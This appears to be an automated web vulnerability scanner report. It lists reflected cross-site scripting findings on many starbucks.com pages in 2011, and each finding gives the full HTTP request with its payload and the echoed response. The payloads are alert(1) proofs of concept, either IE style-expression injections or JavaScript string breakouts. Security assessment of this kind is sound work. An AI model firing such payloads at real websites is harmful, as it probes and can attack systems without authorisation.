User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:06 GMT
Connection: close
Content-Length: 38510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/product-advisories?4cd5c"style="x:expression(alert(1))"3d37d7257db=1" />
...[SNIP]...

2.9. http://www.starbucks.com/about-us/our-heritage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/our-heritage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cfef"style="x:expression(alert(1))"1c51ac66bf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/our-heritage?5cfef"style%3d"x%3aexpression(alert(1))"1c51ac66bf6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:04 GMT
Connection: close
Content-Length: 37603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/our-heritage?5cfef"style="x:expression(alert(1))"1c51ac66bf6=1" />
...[SNIP]...

2.10. http://www.starbucks.com/business [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8439b"style="x:expression(alert(1))"d1ac5f7cb9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business?8439b"style%3d"x%3aexpression(alert(1))"d1ac5f7cb9a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:27 GMT
Connection: close
Content-Length: 36606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business?8439b"style="x:expression(alert(1))"d1ac5f7cb9a=1" />
...[SNIP]...

2.11. http://www.starbucks.com/business/foodservice [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/foodservice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56659"style%3d"x%3aexpression(alert(1))"563fe89e48e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56659"style="x:expression(alert(1))"563fe89e48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/foodservice?56659"style%3d"x%3aexpression(alert(1))"563fe89e48e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:28 GMT
Connection: close
Content-Length: 35775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/foodservice?56659"style="x:expression(alert(1))"563fe89e48e=1" />
...[SNIP]...

2.12. http://www.starbucks.com/business/international-stores [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/international-stores

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45cc2"style="x:expression(alert(1))"db7f4597e3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/international-stores?45cc2"style%3d"x%3aexpression(alert(1))"db7f4597e3f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:12 GMT
Connection: close
Content-Length: 36211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/international-stores?45cc2"style="x:expression(alert(1))"db7f4597e3f=1" />
...[SNIP]...

2.13. http://www.starbucks.com/business/licensed-stores [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/licensed-stores

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4641a"style%3d"x%3aexpression(alert(1))"960dd899042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4641a"style="x:expression(alert(1))"960dd899042 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/licensed-stores?4641a"style%3d"x%3aexpression(alert(1))"960dd899042=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:26 GMT
Connection: close
Content-Length: 35650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/licensed-stores?4641a"style="x:expression(alert(1))"960dd899042=1" />
...[SNIP]...

2.14. http://www.starbucks.com/business/office-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /business/office-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c588f"style="x:expression(alert(1))"7c2218a24c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/office-coffee?c588f"style%3d"x%3aexpression(alert(1))"7c2218a24c5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:44 GMT
Connection: close
Content-Length: 37633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/business/office-coffee?c588f"style="x:expression(alert(1))"7c2218a24c5=1" />
...[SNIP]...

2.15. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd912"style="x:expression(alert(1))"c7bd23ee043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center?cd912"style%3d"x%3aexpression(alert(1))"c7bd23ee043=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:13 GMT
Connection: close
Content-Length: 42847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center?cd912"style="x:expression(alert(1))"c7bd23ee043=1" />
...[SNIP]...

2.16. http://www.starbucks.com/career-center [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c23fe"%3balert(1)//0dffb39826 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c23fe";alert(1)//0dffb39826 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center?c23fe"%3balert(1)//0dffb39826=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:15 GMT
Connection: close
Content-Length: 42747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ext/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759753001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center?c23fe";alert(1)//0dffb39826=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.17. http://www.starbucks.com/career-center/career-diversity [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45639"style="x:expression(alert(1))"a3851b9f98e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/career-diversity?45639"style%3d"x%3aexpression(alert(1))"a3851b9f98e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:02 GMT
Connection: close
Content-Length: 38646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity?45639"style="x:expression(alert(1))"a3851b9f98e=1" />
...[SNIP]...

2.18. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62b53"%3balert(1)//fc24e1787a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62b53";alert(1)//fc24e1787a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center/career-diversity/partner-networks?62b53"%3balert(1)//fc24e1787a8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:21 GMT
Connection: close
Content-Length: 40731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
s = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "275225263001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center/career-diversity/partner-networks?62b53";alert(1)//fc24e1787a8=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.19. http://www.starbucks.com/career-center/career-diversity/partner-networks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/career-diversity/partner-networks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae7f1"style="x:expression(alert(1))"dbb34cb95f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/career-diversity/partner-networks?ae7f1"style%3d"x%3aexpression(alert(1))"dbb34cb95f4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:17 GMT
Connection: close
Content-Length: 40826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/career-diversity/partner-networks?ae7f1"style="x:expression(alert(1))"dbb34cb95f4=1" />
...[SNIP]...

2.20. http://www.starbucks.com/career-center/international-positions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/international-positions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab6ec"style="x:expression(alert(1))"95aa1e09f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/international-positions?ab6ec"style%3d"x%3aexpression(alert(1))"95aa1e09f92=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:23:03 GMT
Connection: close
Content-Length: 36752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/international-positions?ab6ec"style="x:expression(alert(1))"95aa1e09f92=1" />
...[SNIP]...

2.21. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 287e3"%3balert(1)//6be60617140 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 287e3";alert(1)//6be60617140 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /career-center/working-at-starbucks?287e3"%3balert(1)//6be60617140=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:39 GMT
Connection: close
Content-Length: 43747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "651624292001";
   flashvars.playerLocation = "http://www.starbucks.com/career-center/working-at-starbucks?287e3";alert(1)//6be60617140=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.22. http://www.starbucks.com/career-center/working-at-starbucks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /career-center/working-at-starbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 587cf"style="x:expression(alert(1))"c23cb73b348 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /career-center/working-at-starbucks?587cf"style%3d"x%3aexpression(alert(1))"c23cb73b348=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:22:37 GMT
Connection: close
Content-Length: 43842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/career-center/working-at-starbucks?587cf"style="x:expression(alert(1))"c23cb73b348=1" />
...[SNIP]...

